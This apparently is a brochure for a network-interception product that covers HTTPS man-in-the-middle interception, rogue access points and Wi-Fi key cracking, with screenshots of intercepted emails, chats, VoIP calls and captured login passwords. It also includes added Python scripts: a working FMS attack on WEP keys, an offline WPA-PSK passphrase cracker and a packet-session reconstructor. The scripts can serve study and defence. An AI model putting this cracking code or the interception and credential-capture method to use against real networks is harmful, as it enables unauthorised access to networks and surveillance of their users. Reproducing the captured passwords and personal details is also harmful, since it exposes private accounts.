Network Investigation Toolkit (NIT): Internet LAN HTTPS/SSL MITM Intercept - Active Mode

[Diagram: SSL servers and the server farm are reached through the Router/Firewall and Switch/Hub; the NIT system, managed by the administrator, is inserted between the targeted users pool and that path and terminates the users' TLS sessions itself.]

The MITM attack is carried out with the NIT's own uplink to the Internet, by:
1. Connect to LAN Internet
2. Connect to WLAN Internet
3. Connect to 3G Internet

An HTTPS/SSL MITM decrypts only the sessions of clients that accept the interceptor's certificate: a browser that enforces HSTS or certificate pinning for the site, or a user who refuses the certificate warning, ends the interception for that session, and the substituted certificate remains visible to the target in the browser's certificate details.


NIT Implementation Mode - WLAN Passive Interception

NIT System Mode of Operation: WLAN Passive Interception

[Diagram: an AP on channel 6 (AP CH6) with several wireless STAs associated to it and the Internet behind it; the NIT system listens to the channel without transmitting.]

Cracking of:
- WEP key
- WPA-PSK key

NIT System (WLAN Interception): intercepts up to 4 concurrent channels.


NIT Implementation Mode - WLAN HTTPS Interception

NIT WLAN HTTPS/SSL MITM Interception - Active Mode

[Diagram: the wireless STAs associate to the NIT instead of the real AP; the NIT forwards their traffic to the Internet.]

NIT (WLAN HTTPS/SSL MITM Interception): the system acts as an AP for the targeted user and reaches the Internet by:
1. Connect back to AP
2. Connect to LAN Internet
3. Connect to 3.5G Internet

The targeted STA has to be made to associate with the NIT's AP rather than the genuine one (same SSID, and for a WPA-protected network the PSK must already be known), after which the same certificate limits as in the LAN mode apply to the HTTPS sessions.


Cracking/Decryption of WEP/WPA

1. WEP Key Cracking/Decryption (standard system): 128-bit key = 26 HEX characters.

2. WPA-PSK Key Cracking/Decryption (optional module available)
WPA-PSK cracking is an optional module. It uses an external server with a Smart Password List and GPU acceleration technology, which helps and increases the chance of WPA-PSK cracking for LEA. It is a dictionary/mask attack on the captured 4-way handshake, so it recovers only passphrases that the list or mask covers; a long random passphrase stays out of reach.
Countermeasure (when the key cannot be recovered): intercept at the ISP or human intelligence.

Notes:
The time taken to recover the WEP key in passive mode depends on the amount of WEP data traffic (distinct IVs) captured from the target; the recovery is statistical, so an idle network yields nothing.
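The WEP point above is worth seeing in code, because it explains both why the feature is "standard" and why its running time depends on traffic. WEP seeds RC4 with the 3-byte IV, sent in clear, followed by the shared key, and every data frame begins with the fixed LLC/SNAP header, so the first keystream bytes of each frame are known to a listener; the Fluhrer-Mantin-Shamir (FMS) attack turns frames whose IV has the form (A+3, 255, X) into votes for key byte A, and a reused IV leaks the XOR of two plaintexts directly. The example below is written for this page, not Decision Group code: the 26-hex key, the IVs and the frame contents are constructed, the 4-byte ICV that real WEP appends is left out, and only key byte 0 is recovered (the attack repeats with the recovered bytes appended to known_key).

```python
"""Why a passively captured WEP stream gives up its key: WEP seeds RC4 with
IV (3 bytes, sent in clear) || shared key, and every data frame starts with the
known LLC/SNAP header AA AA 03 00 00 00 08 00, so the first keystream bytes of
each frame are recoverable. Fluhrer-Mantin-Shamir (FMS) turns frames whose IV
has the form (A+3, 255, X) into votes for WEP key byte A; an IV reused with the
same key leaks the XOR of the two plaintexts outright. Added example for this
page, not Decision Group code; the 104-bit key, the IVs and the frame contents
are constructed, and the 4-byte ICV that real WEP appends is omitted."""
from collections import Counter

SNAP = bytes.fromhex("aaaa030000000800")   # LLC/SNAP prefix of IP over 802.11


def rc4(key, n):
    """First n RC4 keystream bytes for key (KSA then PRGA)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, key, plaintext):
    """WEP frame body: IV in clear, then plaintext XOR RC4(IV || key)."""
    ks = rc4(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def keystream_prefix(frame):
    """Attacker side: read the IV and recover the first 8 keystream bytes from
    the known SNAP header."""
    iv, body = frame[:3], frame[3:3 + len(SNAP)]
    return iv, bytes(c ^ p for c, p in zip(body, SNAP))


def fms_vote(iv, known_key, first_ks_byte):
    """FMS vote for WEP key byte A = len(known_key). Runs the KSA for the A+3
    steps whose key bytes (IV plus already recovered bytes) are known, checks the
    'resolved' condition, and solves the step-(A+3) update for K[A+3]."""
    A = len(known_key)
    if iv[0] != A + 3 or iv[1] != 255:
        return None
    K, S, j = iv + known_key, list(range(256)), 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or S[1] + S[S[1]] != A + 3:
        return None
    # With ~5% probability the first output byte is S[A+3] as left by step A+3,
    # i.e. S[j + S[A+3] + K[A+3]] of the current state; invert that for K[A+3].
    return (S.index(first_ks_byte) - j - S[A + 3]) & 0xFF


def recover_key_byte(frames, known_key=b""):
    """Tally votes over all captured frames; the true byte should lead the list."""
    votes = Counter()
    for frame in frames:
        iv, ks = keystream_prefix(frame)
        cand = fms_vote(iv, known_key, ks[0])
        if cand is not None:
            votes[cand] += 1
    return votes.most_common()


def iv_reuse_leak(frame1, frame2):
    """Two frames under one IV: ciphertext XOR equals plaintext XOR."""
    assert frame1[:3] == frame2[:3], "frames must share an IV"
    return bytes(a ^ b for a, b in zip(frame1[3:], frame2[3:]))


def sample_capture(key, A=0):
    """What an attacker harvests from a busy network: one frame for every weak
    IV (A+3, 255, X). Constructed: each carries the same SNAP-headed IP stub."""
    body = SNAP + bytes.fromhex("45000054") + bytes(20)
    return [wep_encrypt(bytes([A + 3, 255, x]), key, body) for x in range(256)]


if __name__ == "__main__":
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 26-hex (104-bit) key
    print("key byte 0 = %02x, top votes:" % key[0], recover_key_byte(sample_capture(key))[:3])
```

Only a few percent of the weak-IV frames cast a correct vote, the rest vote at random, so the true byte wins only once enough frames with the right IV shape have been captured; that, not computation, is what the slide's "time taken ... depends on" refers to, and later attacks (KoreK, PTW) shorten it by extracting votes from a far larger share of ordinary frames.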


WPA-PSK Password Recovery

[Screenshot: Elcomsoft Wireless Security Auditor (toolbar: Import data, Create project, Open project, Save project, Start attack, Pause attack, Check for updates, Help contents). Message: "Congratulations! The password has been found." Log:]

10:27:18 April 09, 2011  About to start new recovery: 2 CPU cores, 0 h/w accelerators
10:27:18 April 09, 2011  Starting performance monitor
10:27:19 April 09, 2011  Performance monitor started successfully
10:27:19 April 09, 2011  Recovery: started
10:27:19 April 09, 2011  Recovery: the password has been found :)
10:27:20 April 09, 2011  Recovery: stopped

This is an optional feature! An additional system is required!
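What the auditor above does in a second (for a passphrase that sits early in its list) is an offline test of each candidate against one captured 4-way handshake, and the per-candidate cost is fixed by the standard. The example below, written for this page and not Decision Group or Elcomsoft code, carries the whole check through: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK from the 802.11i PRF over both MAC addresses and both nonces, and the candidate accepted only if KCK = PTK[0:16] reproduces the MIC of the captured EAPOL-Key frame. The SSID, MACs, nonces, EAPOL frame and wordlist are constructed, and the "captured" MIC is computed from a chosen passphrase so that the script checks itself.

```python
"""Offline WPA/WPA2-PSK passphrase recovery, the job the 'Smart Password List'
module and the Elcomsoft auditor shown above do at scale. The attacker needs
the SSID, both MAC addresses, both nonces and one MIC-bearing EAPOL-Key frame
from a captured 4-way handshake; each candidate passphrase is then run through
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK = PRF-512(PMK, ...),
and accepted only if KCK = PTK[0:16] reproduces the captured MIC. Added example
for this page, not Decision Group or Elcomsoft code; SSID, MACs, nonces, the
EAPOL frame, the wordlist and the 'captured' MIC (computed here from a chosen
passphrase so the script checks itself) are all constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i PSK mapping. The 4096 HMAC-SHA1 rounds are the whole cost
    of the attack, which is why the brochure's GPU acceleration matters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce, length=64):
    """PRF-n from 802.11i: HMAC-SHA1(PMK, label || 0x00 || data || counter)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range((length + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
    return out[:length]


def eapol_mic(kck, eapol_frame, wpa2=True):
    """Key MIC over the whole EAPOL-Key frame with its 16-byte MIC field (at
    offset 81) zeroed: HMAC-SHA1-128 for WPA2/RSN, HMAC-MD5 for original WPA."""
    zeroed = eapol_frame[:81] + bytes(16) + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """First passphrase in the list whose KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def sample_handshake(true_passphrase="sunflower2011"):
    """Constructed handshake material for SSID 'ED-LAB' (assumed values): message 2
    of the 4-way handshake (it carries the SNonce) with its MIC filled in."""
    ssid = "ED-LAB"
    ap_mac, sta_mac = bytes.fromhex("00119555f6f1"), bytes.fromhex("002421a1927f")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = (bytes.fromhex("0103005f")          # EAPOL: version 1, type 3 (Key), length 95
             + b"\x02" + b"\x01\x0a"            # descriptor type RSN, key info (MIC|pairwise, v2)
             + b"\x00\x10" + bytes(8)           # key length, replay counter
             + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, key ID
             + bytes(16) + b"\x00\x00")         # MIC placeholder, key data length 0
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    return ssid, ap_mac, sta_mac, anonce, snonce, eapol[:81] + mic + eapol[97:], mic


WORDLIST = ["password", "letmein", "sunflower", "sunflower2011", "Tr0ub4dor&3"]   # constructed

if __name__ == "__main__":
    ssid, ap, sta, an, sn, frame, mic = sample_handshake()
    print("recovered:", crack(ssid, ap, sta, an, sn, frame, mic, WORDLIST))
```

Two things follow from the code. The PBKDF2 step is the only expensive one, and it is salted with the SSID, so precomputed tables only pay off for common network names and a GPU farm is otherwise the only speed-up; and the check needs the passphrase to appear in the list or mask, so the module's "chance of cracking" is exactly the chance that the owner chose a guessable passphrase.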


NIT - Homepage - Status of ...

[Screenshot: http://192.168.1..../frame/frame.php. Menu: HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION]

GUI Refresh in 24 Second(s)
Operation Mode: Ethernet LAN Mirror-Sniffer Capture Mode
Case Name: default
Case Name Import ID: ED-2010-01-04 17:39:19
Created By: admin
Created Date: 2009-12-01 23:09:35
Database ID: EDE_1
Raw Data File(s) Reserving Directory: /home/admin/cases/default/
Services and Ports Information: 4
Operation Mode Status: Running [Stop]

Interface | Captured time | Captured packets | Captured packet size | Lost packets | Lost packet size | Dropped packets | Dropped packet size | TCP packets | TCP packet size | UDP packets | UDP packet size
eth0 | 6064 | 888653 | 255456 KB | 0 | 0 KB | 0 | 0 KB | 163366 | ... | 724398 | ...

Displays the current operation mode and the status of the implementation.


NIT - Case Results

[Screenshot: CASE RESULTS tab, Case: default. A per-MAC summary table lists each client MAC address followed by its record count per protocol (POP3, IMAP, SMTP, ...):]

00:50:7F:29:58:11  0 0 0 0 6 ...
00:24:21:A1:92:7F  13 0 0 5 1 0 0 0 0 0 0 0 0 0 255 231
00:1A:80:5C:5B:DE  7 0 2 2 1 0 2 0 0 0 4 0 0 0 128 128

Drilling down (default > 00:24:21:A1:92:7F > Webmail(Read); Total 3, Total Page 1, Current Page 1; tabs Webmail(Read) | Webmail Token Page | 20 rows) lists No., Date-Time, Account (the client IP, 192.168.1.11), Sender, Receiver, CC, Subject and Webmail Type, e.g.:

44. 2010-01-04 18:15:34  192.168.1.11  wedetective2@hotmail...   wedetective2     Smart CCTV                          YAHOO2.0 Mail
42. 2010-01-04 18:14:53  192.168.1.11  wedetective@yahoo.c...    wedetective2...  Airshow                             YAHOO2.0 Mail
41. 2010-01-04 18:14:53  192.168.1.11  wedetective1@yahoo.c...   wedetective2     Google                              YAHOO2.0 Mail
36. 2010-01-04 18:14:46  192.168.1.11  wedetective2@hotmail...   wedetective2...  frankie@ed...  Test Email           YAHOO2.0 Mail
31. 2010-01-04 18:14:42  192.168.1.11  wedetective2@hotmail...   decision@ed-...  frankie@ed...  Robinho arrested over alleged sexu...  YAHOO2.0 Mail
28. 2010-01-04 18:14:36  192.168.1.11  internet-forensics@e...   wedetective1     wedetectiv...  Ronaldo gives Man United 1-0 win  YAHOO2.0 Mail
25. 2010-01-04 18:14:29  192.168.1.11  twitter-invite-wedet...   wedetective2     Frankie Chan wants to keep up wit...  YAHOO2.0 Mail
24. 2010-01-04 18:14:29  192.168.1.11  frankie@ed-system.sg      frankie@digi...  frankie@ed...  Test Email.....      YAHOO2.0 Mail
(rows 44 down to 24 on this page; several subjects are in Arabic)

Top-Down View on Case Result GUI

Sample: Email (POP3, SMTP, IMAP) 


[Screenshot: HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Case default, MAC 00:24:21:A1:92:7F, POP3, Record/Page 50. Columns: No., Date-Time, Account, Sender, Receiver, CC, Subject, Account (login), Password. Records 8-19 dated 2010-01-04 18:27-18:32 from 192.168.1.11; senders include frankie@digi-forensi..., wedetective2@hotmail..., wedetective1@yahoo.c..., wedetective2@yahoo.c..., Mailer-Daemon@...; receivers frankie@ed-system.sg, frankie@digi-forensi..., kareem.samy@gizasyst..., mohamed.abuelkroush@...; subjects include Brazil nuclear plants..., RE: New Raw Data Fi..., Mail delivery failed: ret..., Fw: Robinho arrested o..., Singapore Flyers, Guardiola warns Ibrah..., Leeds knocks out MU f..., Novo rastreador satelit..., RE: ED system. The login and password columns show the POP3 credentials recovered from each session (e.g. frankie@..., frank; frederick, decision2).]

[Screenshot: one record opened in a mail viewer. From: Decision Computer <wedetective2@hotmail.com>; Date: Monday, 4 January 2010 10:00 AM; To: frankie@digi-forensics.com; Subject: Leeds knocks out MU from FA Cup, wins for Arsenal and Chelsea (Chinese Simplified, GB2312); Attach: computex2009-1.jpg (106 KB); the body is a news article on the FA Cup third round.]


Sample: Webmail (Read and Sent) 


[Screenshot: http://192.168.1....n/frame/frame.php. HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Case default, MAC 00:1A:80:5C:5B:DE, Webmail (Sent), Record/Page 50. Columns: No., Date-Time, Account, Sender, Password, Receiver, BCC, Subject, Webmail Type. Records 4-5 dated 2010-01-04 17:55:25 from 192.168.1.10, sender wedetective2@hotmail..., receivers frankie@digi... and frankie@ed-s..., subject Guardiola warns Ibrahimov..., type Windows Live; Total 2.]

[Screenshot: record opened at http://192.168.1.12:888/general/common/decode/mail/openweb.php?TYPE=3&PARENT_ID=5&mime_val=&R... FROM: wedetective2@hotmail.com; DATE/TIME: 2010-01-04 17:55:25; TO: frankie@digi-forensics.com; SUBJECT: ...wins for Arsenal and Chelsea; ATTACHMENT: 1. computex2009-1.jpg; the body is the same FA Cup article. Status bar: Done, Fiddler: Disabled.]

Webmail Type: Yahoo Mail, HTTP Gmail, Windows Live Hotmail, Giga Mail and others.


Sample: Instant Messaging 


[Screenshot: http://192.168.1....n/frame/frame.php. HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Case default, MAC 00:24:21:A1:92:7F, YAHOO, Download Tool, Record/Page 50. Columns: No., Date-Time, Account, User Handle, Participants, Conversation, Count. Record 2: 2010-01-04 18:41:05, 192.168.1.11, wedetective2 with wedetective1; Total 1.]

[Screenshot: conversation opened at http://192.168.1.12:888/general/common/decode/yahoo/yahoo_msg.php?_PARENT_ID=2&CATEGORY=YAHOO&RunAs=&mime_val=. Date-Time 2010-01-04 18:41:05, User Handle wedetective2. Columns: No., Date-Time, User Handle, Type, Message, Time started, Finish Time. Messages: wedetective2 "hi i am fine", 18:41:20 "yeyayaya", wedetective1 "hello...", 18:42:28 wedetective1 "thanks"; file transfer entries from wedetective1 and wedetective2 with start/finish times 2010-01-04 19:28:02-19:28:57; Total 13. Status bar: Fiddler: Disabled.]

Yahoo: includes file transfer, webcam, voice call (GIPS decoder required).
MSN: includes file transfer, webcam.


Sample: HTTP Link and HTTP Content

[Screenshot: Case default, MAC 00:1A:80:5C:5B:DE, HTTP Content. Columns: No., Date-Time, Account, Content (page title). Records 380-397 dated 2010-01-04 20:55-21:10 from 192.168.1.10: Google; ISS lawful interception - Google Search; TeleStrategies' ISS World; TeleStrategies ISS World Asia Pacific / MEA Dubai / Americas / Europe - Intelligent Support Systems for Lawful Interception, Criminal Investigations and Intelligence Gathering; TeleStrategies, producer of telecommunications industry conferences, seminars, ...; ST701; AddThis utility frame; blogs.str...; 3 pages. The selected record is rendered in a viewer pane as the reconstructed Google results page for "ISS lawful interception" (Results 1 - 10 of about 4,980, 0.23 seconds), including sponsored links (Lawful Interception Tools, www.amesys.fr "Lawful and IP interception" software) and www.issworldtraining.com results for ISS World Americas and Europe.]


Sample: Social Networking Sites - Facebook

[Screenshot: CASE RESULTS | SYSTEM SETTINGS. Case default, MAC C8:0A:A9:F8:08:F1, FACEBOOK; filter Wall / Chat / Game; Every Page 20. Columns: No., Date-Time, Account, User Handle, Content, Method. 17 records dated 2011-08-03 09:57-10:03 from 192.168.1.2, user handle 696045329, all Method GET; content such as Profile | Wall, Profile | Wall | Frankie Chan, Profile | Photos | Photos, and the profile summary (Principal Solutions Architect at Decision Group, studied at Nanyang Technological University, lives in Singapore, from Kuching, Malaysia). The selected record is rendered as the post "Frankie Chan likes a link." pointing at view.my, titled "Player Profesional Nak Pakai Baju Pon Susah | GelakJE!" (Malay: "Professional player can't even put on a shirt"), with the comment "Apa yang susah sangat nak pakai baju training tu?? HAHA!!" ("What's so hard about putting on that training shirt?? HAHA!!").]


Sample: HTTP Video Streaming 


[Screenshot: HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Case default, MAC 00:24:21:A1:92:7F, Video Stream, Record/Page 50. Columns: No., Date-Time, Account, URI, File (size). 21 records; the URIs are YouTube cache hosts (v16.lscache3.c..., r3.sin2.c.youtu..., v9.lscache6.c.y..., v19.lscache5.c..., v24.lscache6.c..., v20.lsca..., v10.lsca..., v3.lsca..., v11.lsca..., v15.lsca..., v13.lsca...) with file sizes from 340.99K to 16.28M (16.28M, 2.70M, 1.56M, 12.87M, 2.02M, 1.94M, 3.24M, 1.25M, 458.43K, 967.50K, 340.99K, 693.27K, 5.80M, 6.00M).]

[Screenshot: one stream opened in the embedded player at http://192.168.1.12:888/general/common/decode/http/player.s... (player.swf, application/x-shockwave-flash), playing a clip titled "Hmm...Hacking Other Computers | See?? Well it could be just that...(for info purposes only)" at 00:15 of 06:22. Status bar: Transferring data from 192.168.1.12..., Fiddler: Disabled.]


Sample: Voice over IP (VoIP) RTP

[Screenshot: HOME | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. VOIP, Record/Page 20. Columns: Date-Time, Account, S. Number, D. Number, Mode, Type, Codec, VOIP File. Records 2-4 with call durations 58 sec, 50 sec and 1 min 3 sec; Total 3. A File Download dialog offers the reconstructed call as 8610044420_8610044421.wav (Wave Sound, 301 KB) from 192.168.1.60, with the browser's standard warning that files from the Internet can harm your computer and should not be opened or saved if the source is not trusted.]


Sample: HTTPS Username and Password

[Screenshot: SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Raw Data Set ID, Refresh, Case: default, Export; Display by: MAC / IP. Per-IP count matrix with one column per decoded service; rows 192.168.6.23 (total 10), 192.168.6.8 (4), 192.168.1.132 (3), 192.168.1.35 (1,254), 192.168.1.34 (1,781), 60.250.163.131 (4), 10.0.0.11 (14), 10.0.0.10 (492); Total 8.]

[Screenshot: Case default, 192.168.1.35, Account/password, Record/Page 20, Total 6.]

No. | Date-Time | Account | User | Password | Server
8 | 2010-11-07 15:41:04 | 192.168.1.35 | bobuuu | eeee | http://signin.ebay.com.sg/ws/eBayISAPI.dll?co... (truncated)
7 | 2010-11-07 15:40:16 | 192.168.1.35 | wedetective2 | jmyohxbc | http://login.yahoo.com/config/login?
6 | 2010-11-07 15:40:04 | 192.168.1.35 | decisiongroup2010 | jmyohxbc | http://www.google.com/accounts/ServiceLoginAuth
3 | 2010-11-07 15:24:00 | 192.168.1.35 | decisiongroup2010 | jmyohxbc | http://www.google.com/accounts/ServiceLoginAuth
2 | 2010-11-07 15:23:43 | 192.168.1.35 | wedetective1 | jmyohxbc | http://login.yahoo.com/config/login?
1 | 2010-11-07 15:23:36 | 192.168.1.35 | wedetective1 | jmyohxbcdecision | http://login.yahoo.com/config/login?


Sample: Incomplete Connections 


[Screenshot: http://192.168.1....n/frame/frame.php. HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Incomplete Records, Record/Page 50.]

No. | Date-Time | Source MAC | Source IP | Dest. IP | S.Port | D.Port | Comment | Incomplete Records
1 | 2010-01-04 18:34:58 | 00:24:21:A1:92:7F | 192.168.1.11 | 20317516236 (dots lost in extraction) | 1973 | 80 | Lost HTTP Header | INCOMPLETE_yKJsT9.dat

Incomplete connection sessions can be viewed in the binary/text (hex) viewer.

[Screenshot: praXoft hex viewer (File, Search, View, Help). File Name: INCOMPLETE_yKJsT9.dat, Size: 4,206 bytes. Address (Hex) / Text (ASCII) columns; the bytes at 0x50-0x100 are a mid-page HTML fragment (images/stories/module/mapsandbrochures-02.jpg with alt="mapsandbrochures-02.jpg" title="mapsandbrochures-02.jpg" height="114" width="140" /></a>, </div>, <div style="clear:both;"></div>, <div class="clear"></div>, /wrapper.. begi...), i.e. the port-80 response body that was captured after the request header had already been missed.]


Search - Free Text (Key Words) 


[Screenshot: http://192.168.1...n/frame/frame.php. HOME | CASE RESULTS | SYSTEM SETTINGS | SYSTEM STATUS | REGISTRATION. Case default, Record/Page 50. Per-IP count matrix with one column per service (POP3, IMAP, SMTP, ...): 192.168.1.11 total 15, 192.168.1.10 total 8; Total 2.]

[Screenshot: Free Text (Key Words) search form. Search Parameters: Date, Time, Source IP, Email Address, P2P Tool, Game Name, MSN Account (User Handle / Participants), ICQ Account (User Handle / Participants); Search Category; Advanced Search (Conditional Search).]


Offline Packet Reconstruction Series
E-Detective Decoding Center (EDDC)


Introduction to EDDC 


* EDDC is a Unix/Linux-based system designed for manual, offline reconstruction of raw data (PCAP) files.

* It lets an administrator create separate projects/cases for different users/investigators (each with its own level of authority) to run Internet raw data parsing and forensic analysis tasks on the system.

* The system can reconstruct Internet applications/services such as Email (POP3, SMTP, IMAP), Webmail (Yahoo Mail, Gmail, Hotmail etc.), IM (Yahoo, MSN, ICQ, QQ, UT, IRC, Google Talk, Skype voice call log), File Transfer (FTP, P2P), HTTP (Link, Content, Reconstruct, Upload/Download, Video Stream), Telnet, Online Games, VoIP (Yahoo), Webcam (Yahoo, MSN).

* EDDC can be used by any group of users who wish to view the content of network traffic from pre-captured raw data files. It is designed for both private and public sector users.


User/Case Management - Offline Internet Raw Data Parser/Reconstruction - Search Function


EDDC Application and Implementation Diagram

Offline raw data decoding and reconstruction system. Comes with user and case management functions.

[Diagram: raw data is collected and imported per case into EDDC/XDDC (Raw Data for Case 1, Raw Data for Case 2); Investigator 1 works Case 1 and receives Case 1 Results, Investigator 2 works Case 2 and receives Case 2 Results. EDDC reconstructs the various Internet protocols/service types.]


Introduction to EDDC-LEMF (1) 


* A lawful interception solution for parsing PCAP files or raw packet data streams from front-end mediation platforms or broadband service routers.

* Decodes all data packets associated with a protocol, based on the service port number and the session they belong to.

* Saves un-decoded data into a specified directory in PCAP format.

* Outputs decoded data into a database, with the associated multimedia files and XML files laid out in a predefined way.

* Compliant with ETSI TS 101 671 and ETSI ES 201 671.
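The decoding bullets above (group packets by service port and session, save what cannot be decoded back out as PCAP) and the "Lost HTTP Header" incomplete record shown earlier describe one pipeline. The script below is an added example written for this page, not Decision Group's code and not EDDC's actual parser: using only the Python standard library it walks a libpcap file, keys every TCP segment to a (client, server, client port, server port) session, reassembles each direction by sequence number, dispatches on the server port (25 to an SMTP envelope/Subject decoder, 80 to an HTTP request-line/Host decoder), flags a port-80 session that has no request line as an incomplete "Lost HTTP Header" record that keeps the raw bytes for a hex viewer rather than guessing a URL, and returns sessions with no decoder as a fresh PCAP. The capture, hosts and addresses are constructed inline and are made up; the client/server heuristic (a decoder's port, else the lower port) and the lack of retransmission handling and XML/database output are simplifications of this example, not statements about the product.

```python
import re
import struct
from collections import defaultdict

def frame(src, dst, sport, dport, seq, payload):
    """Constructed Ethernet/IPv4/TCP frame; checksums stay zero (never validated here)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def pcap(frames):
    """Classic libpcap container: magic 0xa1b2c3d4, little-endian, linktype 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1262600000 + i, 0, len(f), len(f)) + f
    return out

# Constructed capture (made-up hosts): out-of-order SMTP segments, one HTTP session whose
# request packet was never captured, and one port-5050 session that has no decoder.
CLI, MAIL, WEB, IM = "192.168.1.11", "10.0.0.5", "10.0.0.6", "10.0.0.7"
SMTP_A = b"EHLO pc\r\nMAIL FROM:<wedetective2@example.test>\r\nRCPT TO:<fran"
SMTP_B = b"kie@example.test>\r\nDATA\r\nSubject: Test Email\r\n\r\nhello\r\n.\r\nQUIT\r\n"
SAMPLE_PCAP = pcap([
    frame(CLI, MAIL, 1025, 25, 1000 + len(SMTP_A), SMTP_B),
    frame(MAIL, CLI, 25, 1025, 5000, b"220 mail ready\r\n"),
    frame(CLI, MAIL, 1025, 25, 1000, SMTP_A),
    frame(CLI, WEB, 1026, 80, 7000, b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"),
    frame(WEB, CLI, 80, 1026, 8000, b"HTTP/1.1 200 OK\r\n\r\n<html>ok</html>"),
    frame(WEB, CLI, 80, 1973, 9000, b'</div><div class="clear"></div>'),
    frame(CLI, IM, 49152, 5050, 3000, b"YMSG"),
])

def iter_frames(data):
    off = 24                                   # skip the 24-byte global header
    while off + 16 <= len(data):
        incl = struct.unpack_from("<IIII", data, off)[2]
        off += 16
        yield data[off:off + incl]
        off += incl

def parse_tcp(f):
    """Return (src, dst, sport, dport, seq, payload), or None for non-IPv4/TCP frames."""
    if f[12:14] != b"\x08\x00" or f[23] != 6:
        return None
    t, total = 14 + (f[14] & 0x0F) * 4, struct.unpack_from("!H", f, 16)[0]
    sport, dport, seq = struct.unpack_from("!HHI", f, t)
    src, dst = ".".join(map(str, f[26:30])), ".".join(map(str, f[30:34]))
    return src, dst, sport, dport, seq, f[t + (f[t + 12] >> 4) * 4:14 + total]

def decode_smtp(c2s, s2c):
    """Envelope and Subject from the client stream (naive: also scans the DATA body)."""
    rec = {"protocol": "SMTP", "status": "complete", "receivers": []}
    for line in c2s.split(b"\r\n"):
        key, _, val = line.partition(b":")
        if key.upper() == b"MAIL FROM":
            rec["sender"] = val.strip(b" <>").decode()
        elif key.upper() == b"RCPT TO":
            rec["receivers"].append(val.strip(b" <>").decode())
        elif key.lower() == b"subject" and "subject" not in rec:
            rec["subject"] = val.strip().decode()
    return rec

def decode_http(c2s, s2c):
    """Request line and Host; without a request line the session is an incomplete record."""
    first = c2s.split(b"\r\n", 1)[0]
    if not re.fullmatch(rb"[A-Z]+ \S+ HTTP/1\.[01]", first):
        return {"protocol": "HTTP", "status": "incomplete",   # keep raw bytes, guess no URL
                "comment": "Lost HTTP Header", "raw": c2s + s2c}
    method, uri, _ = first.decode().split(" ", 2)
    host = re.search(rb"\r\nHost: ([^\r\n]+)", c2s)
    return {"protocol": "HTTP", "status": "complete", "method": method, "uri": uri,
            "host": host.group(1).decode() if host else ""}

DECODERS = {25: decode_smtp, 80: decode_http}

def reconstruct(data):
    """Key segments to (client, server, cport, sport), reassemble by seq, decode by port."""
    sessions, leftover = defaultdict(lambda: {"c2s": [], "s2c": []}), []
    for f in iter_frames(data):
        if not (p := parse_tcp(f)):
            continue
        src, dst, sport, dport, seq, payload = p
        # Server side = the port with a decoder, else the lower port (a real reassembler
        # would key on the SYN direction instead of this heuristic).
        if dport in DECODERS or dport < sport:
            key, way = (src, dst, sport, dport), "c2s"
        else:
            key, way = (dst, src, dport, sport), "s2c"
        if key[3] not in DECODERS:
            leftover.append(f)              # undecoded: handed back in PCAP form
        elif payload:
            sessions[key][way].append((seq, payload))
    records = []
    for (client, server, cport, sport), s in sessions.items():
        streams = [b"".join(p for _, p in sorted(s[way])) for way in ("c2s", "s2c")]
        rec = DECODERS[sport](*streams)
        rec.update(client=client, server=server, client_port=cport, server_port=sport)
        records.append(rec)
    return records, pcap(leftover)
```

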